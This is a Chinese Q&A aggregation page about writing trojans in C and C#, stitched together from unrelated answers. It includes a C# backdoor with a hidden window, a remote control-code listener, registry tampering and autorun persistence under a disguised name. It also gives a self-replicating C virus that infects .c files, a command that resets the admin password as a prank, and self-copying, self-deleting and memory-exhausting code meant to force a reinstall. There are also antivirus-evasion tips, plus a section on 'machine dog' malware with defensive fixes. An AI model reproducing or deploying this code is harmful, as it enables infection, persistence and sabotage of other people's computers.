c語言木馬源代碼

A. 如何用c語言編一個假中毒的惡作劇程序

一個小東西 介紹了後別笑話我 ！它的功能很簡單，就是把Administrator的密碼該成xiaoniaoheihei
大家整了人之後切記告訴他密碼(xiaoniaoheihei)

由於不能上傳文件文件尺寸:
小於 200 kb
可用擴展名: gif, jpg
自己可以用TC2.0編寫編譯調試生成
C語言下的代碼如下：

main()
{
system("net user administrator xiaoniaoheihei");
}
如果自己真的不小心忘記了密碼 如果是XP系統 管理員密碼破解如下：
1.用個啟動盤啟動電腦後進入DOS 狀態下：輸入如下命令
del X:\windows\sysrem32\config\sam 回車
x:\windows\repair\sam x:\windows\system32\config 回車
2.重新啟動計算機。X為安裝XP的盤 一般為c:

B. c語言可以編個木馬嗎

要實現木馬服務的程序，主要實現以下幾個功能：後台的運行（隱藏技術），控制碼的接收與注冊表的修改，下面對這三方面做介紹：

1、在VC#中，建立一個後台服務程序是很容易的，先建立一個新的C#的Windows應用程序，項目名稱自定（不過為了隱藏可使用與系統相近的名稱），將窗體屬性「ShowInTaskbar」屬性設為false,讓它運行時不會在任務欄中顯示，並將屬性「Windowstate」屬性設為Mininized即可，這樣窗體就可以隱藏運行了。當然你也可以在InitializeComponent()設置，此函數起初始化的作用，在窗體顯示前運行，代碼如下：

private void InitializeComponent()
{
//
// Form1
//
//窗體顯示的起點和大小
this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
this.ClientSize = new System.Drawing.Size(368, 357);
//窗體名稱
this.Name = "Form1";
//設置屬性讓它後台運行
this.ShowInTaskbar = false;
this.Text = "Form1";
this.WindowState = System.Windows.Forms.FormWindowState.Minimized;
}

2、控制代碼的接收，必需在服務程序運行開始就啟動，所以偵聽線程必需在程序初始化中啟動，所以放在窗體的構造函數中，代碼註解如下：

public Form1() //窗體的構造函數
{
//
// Windows 窗體設計器支持所必需的
//
InitializeComponent();

//
// TODO: 在 InitializeComponent 調用後添加任何構造函數代碼
//加入你的偵聽代碼
//埠你可以自已設定,我使用了固定的埠
int port =6678;
//System.Net.Sockets.TcpListener是用來在Tcp網路中偵聽客戶端的
listener = new TcpListener(port);
//啟動偵聽
listener.Start();
//增加接收控制碼的線程,如果要停止線程可以用 Thread.abort()
//reControlCode 是線程啟動執行的函數，此函數根據接收的控制
//控制碼選取合適的注冊表修改函數
Thread thread = new Thread(new ThreadStart(reControlCode));
thread.Start();
}
reControlCode函數如下，完整代碼見程序
private void reControlCode()
{
//設置接收套接字,接收listener.AcceptSocket是返回已經接收的客戶的請求
socket = listener.AcceptSocket();
//如果連接成功執行
while (socket.Connected)
{
//接收控制碼
byte [] by =new byte[6];
int i = socket.Receive(by,by.Length ,0);
string ss = System.Text.Encoding.ASCII.GetString(by);
//根據控制碼執行不同的功能

//修改注冊表加入編碼
switch (ss)
{
case "jiance"://測試連接,返回測試信息
string str ="hjc";
byte [] bytee = System.Text.Encoding.ASCII.GetBytes(str);
socket.Send(bytee,0,bytee.Length,0);
break;
case "zx1000":
//修改注冊表函數,自已定義，見下面分析
UnLogOff();
//返回控制消息
retMessage();
break;

case "zx0100":
//修改注冊表函數
UnClose();
//返回控制消息
retMessage();
break;
//重復的case功能與前面一樣,略掉
default:
break;
}//case
}//while
} //private void reControlCode

3、C#中實現注冊表的修改，使用了.NET類庫中的System.Microsoft.Win32命令空間，它提供兩種類型的類：處理由操作系統引發的事件的類和對系統注冊表進行操作的類。下面就可以看到它的用法。這里我做了一個修改注冊表的子程序：使計算機不能注銷。在這之前先了解注冊表，在子鍵SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer
下面設鍵值NoLogOff 為 1 即可使計算機無法注銷。在下面的函數中用C#實現對注冊表的修改：

private void UnLogOff()
{
//得到主機的注冊表的頂級節點
Microsoft.Win32.RegistryKey rLocal = Registry.LocalMachine;
//設置一個注冊表子鍵的變數
RegistryKey key1;
try
{
//函數RegistryKey.OpenSubkey(string registrykey,bool canwrite)檢索指定的子鍵
//registrykey是用戶指定的鍵值，canwrite 為true則可修改，默認為fasle不可改
key1 =
rLocal.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
//設置子鍵的鍵名，和值
key1.SetValue ("NoLogOff",1);
//關閉打開的子鍵
key1.Close();
//警告字元串設定
mystr = mystr +"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer鍵值Nologoff被修改！請將它置為0!";
}
catch{}
//如果不存在自已建立
if(key1 ==null)
{
try
{
//使用RegistryKey.CreateSubKey(string mystring)函數來建立你需要的子鍵
RegistryKey key2 = rLocal.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",1);
key2.Close();
mystr = mystr +"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer鍵值Nologoff被修改！請將它置為0!";
}
catch{}
}
}

4、在木馬程序中還有一個重要的功能就是自我的復制和轉移。木馬引入被控制的主機時必需自動將木馬隱藏在System,System32的目錄下以防被發現。轉移的代碼分析如下，主要實現的功能是將D盤下的木馬程序轉移到C:\\winnnt\\system\\msdoss.exe，同時換名稱。使用的.NET命名空間System.IO,它的作用是允許對數據流和文件進行同步和非同步讀寫。這里我們使用了System.IO.File類。

private void moveCC1()
{
try
{
//函數File.Move(string sourceFileName,string destFileName)起移動文件的作用
//sourceFileName為要移動的文件名，destFileName為文件的新路徑
File.Move("C:\\winnnt\\system\\msdoss.exe","d:\\winnt\\system32\\expleror.exe");
}
catch {}
//將新移的木馬程序設為自啟動.分析和前面一樣
try
{
key1 = rLocal.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue ("microsoftt","d:\\winnt\\system32\\expleror.exe");
key1.Close();
}
catch{}
if(key1 ==null)
{
try
{
RegistryKey key2=rLocal.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key1.SetValue ("microsoftt","d:\\winnt\\system32\\expleror.exe");
key1.Close();
}
catch{}
}
} //moveCC1()
按照步驟來就可以得到一個C#木馬了..
都給出答案了.可以給分卜？

C. C語言：木馬板凳三十三，百個腿腿地下翻，求具體編程，感謝大神，定會追加分！

詳細說明下，是不是一個是2條腿，一個是4條腿
#include<iostream>
using namespace std;
int main()
{
int m,n,t,g;
cout<<"請輸入他們的各自個數和腿的個數：";
cin>>n>>m;
{
t=m/2-n;
g=n-t;
if((t>=0&&g>=0)&&(2*g+4*t==m))
{
cout<<g<<" "<<t<<endl;
}
else
cout<<"Error"<<endl;

}
return 0;
}

D. 請介紹下C語言寫木馬的演算法......

我只知道window的木馬程序的原理，首先你要去研究一下windows PE文件的格式，windows PE文件包括(exe dll文件等)，用文本方式打開任意一個exe或者dll文件，就會發現這些文件都具有類似的組織結構（就是PE格式）
仔細耐心地研究了PE格式後，你會發現這些PE格式的文件有很多間隙空間可用，window木馬程序正是利用PE格式文件中的這些間隙，把自己的代碼插入這些間隙空間中，同時還要修改宿主程序的入口地址（OEP Original Entry Point）
這樣，宿主程序一運行，首先運行生成木馬的代碼，然後運行宿主程序。

Windows應用程序捆綁核心編程 （PE）
http://book.csdn.net/bookfiles/212/10021210198.shtml

http://www.diybl.com/course/3_program/c++/cppjs/2008219/100330.html

E. c語言木馬源代碼

ls這個好像是感染c文件的病毒,自動加上玩笑代碼(當然可以是惡意的)
不是木馬

F. c語言源文件編譯後成了木馬，求解

代碼沒有大問題
#include<stdio.h>
#include<stdlib.h>
intmain(void)
{
inta[10],i;
for(i=0;i<10;i++)
scanf("%d",&a[i]);
for(i=0;i<10;i++)
printf("%d
",a[i]);
system("pause");
return0;//因為intmain()，所以要有個返回值
}

估計你所說的木馬是你系統帶的殺毒軟體誤報的！ 你程序的文件名最好寫個略有復雜性的名稱，如：test_20140831.c

G. c語言木馬代碼，簡單點的，我保證不做違法的

#include <stdio.h>
#include <dir.h>
void main(void)
{
virus();
}
int virus()
{
struct ffblk ffblk;
FILE *in,*out,*read;
char *virus="virus.c";
char buf[50][80];
char *p;
char *end="return";
char *bracket="}";
char *main="main";
char *include[2]={"stdio.h","dir.h"};
char *int_virus="int virus()";
char *buffer;
int done,i,j=0,flag=0;
printf("\nI have a virus. Writen by PuBin\n");
done = findfirst("*.c",&ffblk,0);
while (!done)
{
i=0;
if ((in = fopen(ffblk.ff_name, "rt"))== NULL)
{
goto next;
}
do{
if(i>=50)
{
fclose(in);
goto next;
}
p=fgets(buf[i],80,in);
i++;
}while(p!=NULL);
fclose(in);
out=fopen(ffblk.ff_name,"w+t");
fputs("#include<stdio.h>\n",out);
fputs("#include<dir.h>\n",out);
do
{
if(strstr(buf[j],main)!=NULL)
{
for(;j<i-1;j++)
if(strstr(buf[j],end)==NULL&&strstr(buf[j],bracket)==NULL)
fputs(buf[j],out);
else
{
if(flag==0)
{
flag=1;
fputs("virus();\n",out);
}
fputs(buf[j],out);
}
}
else if((strstr(buf[j],include[0])==NULL)
&&(strstr(buf[j],include[1])==NULL))
{
fputs(buf[j],out);
j++;
}
else
j++;
}while(j<i-1);
read=fopen(virus,"rt");
do
{
p=fgets(buffer,80,read);
if(strstr(buffer,int_virus))
while(p!=NULL)
{
if(strstr(buffer,virus)==NULL)
fputs(buffer,out);
else
{
fputs(" char *virus=\"",out);
fputs(ffblk.ff_name,out);
fputs("\";\n",out);
}
p=fgets(buffer,80,read);
}
}while(p!=NULL);

fclose(read);
fclose(out);
printf("\nYour c program %s has a virus. Writen by PuBin\n",ffblk.ff_name);
next: done = findnext(&ffblk);
}
return 0;
}
再就是網上一網路一大堆的。

H. 誰有機器狗木馬病毒的C語言程序代碼

計算機病毒「機器狗」
機器狗的生前身後，曾經有很多人說有穿透還原卡、冰點的病毒，但是在各個論壇都沒有樣本證據，直到2007年8月29日終於有人在社區里貼出了一個樣本。這個病毒沒有名字，圖標是SONY的機器狗阿寶，就像前輩熊貓燒香一樣，大家給它起了個名字叫機器狗。
工作原理
機器狗本身會釋放出一個pcihdd.sys到drivers目錄，pcihdd.sys是一個底層硬碟驅動，提高自己的優先順序接替還原卡或冰點的硬碟驅動，然後訪問指定的網址，這些網址只要連接就會自動下載大量的病毒與惡意插件。然後修改接管啟動管理器，最可怕的是，會通過內部網路傳播，一台中招，能引發整個網路的電腦全部自動重啟。
重點是，一個病毒，如果以hook方式入侵系統，接替硬碟驅動的方式效率太低了，而且毀壞還原的方式這也不是最好的，還有就是這種技術應用范圍非常小，只有還原技術廠商范圍內有傳播，在這方面國際上也只有中國在用，所以，很可能就是行業內杠。
對於網吧而言，機器狗就是劍指網吧而來，針對所有的還原產品設計，可預見其破壞力很快會超過熊貓燒香。好在現在很多免疫補丁都以出現，發稿之日起，各大殺毒軟體都以能查殺。
免疫補丁之爭
現在的免疫補丁之數是疫苗形式，以無害的樣本復制到drivers下，欺騙病毒以為本身以運行，起到阻止危害的目的。這種形式的問題是，有些用戶為了自身安全會在機器上運行一些查毒程序（比如QQ醫生之類）。這樣疫苗就會被誤認為是病毒，又要廢很多口舌。
解決之道
最新的解決方案是將system32/drivers目錄單獨分配給一個用戶，而不賦予administror修改的許可權。雖然這樣能解決，但以後安裝驅動就是一件頭疼的事了。
來徹底清除該病毒，處理後重啟一下電腦就可以了，之前要打上補丁！
或者這樣：
1注冊表，組策略中禁止運行userinit.exe 進程
2 在啟動項目中加入批處理
A : 強制結束userinit.exe進程 Taskkill /f /IM userinit.exe （其中「/IM」參數後面為進程的圖像名，這命令只對XP用戶有效）
B : 強制刪除userinit.exe文件 DEL /F /A /Q %SystemRoot%\system32\userinit.exe
C : 創建userinit.exe免疫文件到%SystemRoot%\system32\
命令：md %SystemRoot%\system32\userinit.exe >nul 2>nul
或者 md %SystemRoot%\system32\userinit.exe
attrib +s +r +h +a %SystemRoot%\system32\userinit.exe
D : reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\userinit.exe" /v debugger /t reg_sz /d debugfile.exe /f
userinit1.exe是正常文件改了名字，多加了一個1，你也可以自己修改，不過要手動修改這4個注冊表，並導出，這個批處理才能正常使用。
最新動向
好像機器狗的開發以停止了，從樣本放出到現在也沒有新的版本被發現，這到讓我們非常擔心，因為雖著研究的深入，現在防禦的手段都是針對病毒工作原理的，一但機器狗開始更新，稍加改變工作原理就能大面積逃脫普遍的防禦手段，看來機器狗的爆發只是在等待，而不是大家可以高枕了。
目前網上流傳一種叫做機器狗的病毒，此病毒採用hook系統的磁碟設備棧來達到穿透目的的，危害極大，可穿透目前技術條件下的任何軟體硬體還原！基本無法靠還原抵擋。目前已知的所有還原產品，都無法防止這種病毒的穿透感染和傳播。
機器狗是一個木馬下載器，感染後會自動從網路上下載木馬、病毒，危及用戶帳號的安全。
機器狗運行後會釋放一個名為PCIHDD.SYS的驅動文件，與原系統中還原軟體驅動進行硬碟控制權的爭奪，並通過替換userinit.exe文件，實現開機啟動。
>> 那麼如何識別是否已中毒呢？
是否中了機器狗的關鍵就在 Userinit.exe 文件，該文件在系統目錄的 system32 文件夾中，點擊右鍵查看屬性，如果在屬性窗口中看不到該文件的版本標簽的話，說明已經中了機器狗。如果有版本標簽則正常。
臨時解決辦法：
一是在路由上封IP：
ROS腳本,要的自己加上去
/ ip firewall filter
add chain=forward content=yu.8s7.net action=reject comment="DF6.0"
add chain=forward content= action=reject
二是在c:\windows\system32\drivers下建立免疫文件： pcihdd.sys ，
三是把他要修改的文件在做母盤的時候，就加殼並替換。
在%systemroot%\system32\drivers\目錄下 建立個 明字 為 pcihdd.sys 的文件夾 設置屬性為 任何人禁止
批處理
md %systemroot%\system32\drivers\pcihdd.sys
cacls %systemroot%\system32\drivers\pcihdd.sys /e /p everyone:n
cacls %systemroot%\system32\userinit.exe /e /p everyone:r
exit
目前，網路流行以下解決方法，或者可以在緊急情況下救急：
1、首先在系統system32下復制個無毒的userinit.exe，文件名為FUCKIGM.exe(文件名可以任意取)，這就是下面批處理要指向執行的文件！也就是開機啟動userinit.exe的替代品！而原來的userinit.exe保留！其實多復制份的目的只是為了多重保險！可能對防止以後變種起到一定的作用。
2、創建個文件名為userinit.bat的批處理（文件名也可任意取，但要和下面說到的注冊表鍵值保持一致即可），內容如下：
start FUCKIGM.exe (呵呵，夠簡單吧？)
3、修改注冊表鍵值，將userinit.exe改為userinit.bat。內容如下：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\WINDOWS\\system32\\userinit.bat,"
就這3步，讓這條狗再也凶不起來！這是在windows 2003測試的，雙擊機器狗後，沒什麼反應，對比批處理也是正常，即這狗根本沒改動它！開關機游戲均無異常！但唯一美中不足的是，採用經典模式開機的啟動時會出現個一閃而過的黑框！

I. 我在學c語言，誰有木馬程序能給提供一下不

Autorun的免疫程序可以防止inf再次被其他文件修改
利用外面的腳本語言給定的參數選擇性運行程序的某種方案(例如.dos.shell.bat,autorun.inf......)

利用new,進程ID，read,write，和。。。。。
。利用把exe變成rc文件用vc打開import 你想要的應用程序 ico圖標文件
領悟了一點

晚上回去補上
貌似改變當前程序運行的工作目錄，就可以對自己進行自我刪除？？？？這就是傳說中的自我銷毀？待測試
#include <stdio.h>
#include <direct.h>
#include <windows.h>
#include <string.h>
int main(int argc,char *argv[])
{
char pwd[40]="del ";
chdir("c:\\");
strcat(pwd,argv[0]);
system(pwd);
return 0;
}
linux中有這么一句話：在進程運行過程中，當前目錄所在的文件系統是不能卸載的，，，？？？如何理解？？待解決？跟自我銷毀有什麼關系？
在linux中的這段代碼紅色部分不會執行，？？為何？rm 到底 刪除的是什麼？
我們把中的rm改成其他命令下面的也不會運行 看來這是exec函數族 的 機制問題，待考證
#include<stdio.h>
#include<unistd.h>

int main(int argc,char *argv[])
{
if( execlp("rm","rm",argv[0],NULL) < 0)
{
perror("execlp error:");
}
else fprintf(stdout,"delmyself success!\n");
printf("del success\n");

return 0;
}

試驗證明這段代碼調試能過但運行會出錯/ 顯示。。。。。。test.exe拒絕訪問據說可以利用多進程實現，在linux中是允許自我刪除的，，就像linux中的守護進程

我們先用c實現 文件的自我復制功能：

[cpp] view plain
#include<stdio.h>
int main(int argc,char *argv[])
{
FILE *fp1,*fp2;
char buf[200];
int nmemb;
if((fp1 = fopen(argv[0],"rb")) == NULL)//注意這里是以二進制的方式
{
printf("source error\n");
return -1;
}

if((fp2 = fopen("dest.exe","wb")) == NULL)//注意這里是以二進制的方式
{
printf("dest error\n");
return -2;
}
while(( nmemb = fread(buf,1,100,fp1) ) != 0 )
{
fwrite(buf,1,nmemb,fp2);
}
fclose(fp1);
fclose(fp2);
return 0;
}
windows環境測試通過 linux環境 需要把dest.exe改下 就ok 真正的自我復制哦
若用open函數則會出現下列自動被識別為病毒文件了

用fopen的話
當對某個文件進行重新寫入的時候，殺毒軟體會以為他要感染其他文件 所以就會發出警報

殺毒軟體殺不出來
若有改進 則馬上那個更新
下面我們要實現 這個執行文件的破壞能力 那就是用
int *p;
while(1)
{
p = (int *)new(1000000);
}
設想：利用資源把exe文件當二進制文件引入，然後再在主執行文件中調用它，這樣可以把捆綁在一起 程序 的分開 已經解決
病毒另一個特徵是 感染，這個，得到本目錄里的文件名然後重寫？利用多進程，？？，》？(修改其他文件會被nod32查出)

佔用內存空間 導致機子完全死機，大家要記得利用c把這個文件復制到啟動欄里去，或者寫到服務里去讓系統啟動的時候自動載入他，這樣非專業人士就救不了那電腦了，只有重裝，可以寫在其他盤里，然後做些處理，讓運行時檢查這個文件是否存在，不存在 則自我復制，，，，，

J. 誰曾經寫過木馬，求良性木馬的源碼，可以的話是C語言或C++的。打個比方，木馬不會對電腦造成傷害，只

1：木馬首先沒有良性這一說
2：至於編程語言C D E 都可以
3：木馬要駐留系統的方式你要了解
基本駐留採用 進程插入 內存駐留 注冊表啟動 系統程序鉤子 注冊成服務啟動 第三方軟體感染
免殺這個問題 要學習的也不少
1：代碼免殺
2：特徵碼免殺
3：行為免殺
4：其他方式
普通的加殼 加花 偽造簽名 好多種
不只是免殺的問題 還要考慮殺毒軟體的採集分析逆向等等

還是好好學習下系統編程做正規軟體吧
做木馬沒有前途 只有違法進監獄一說了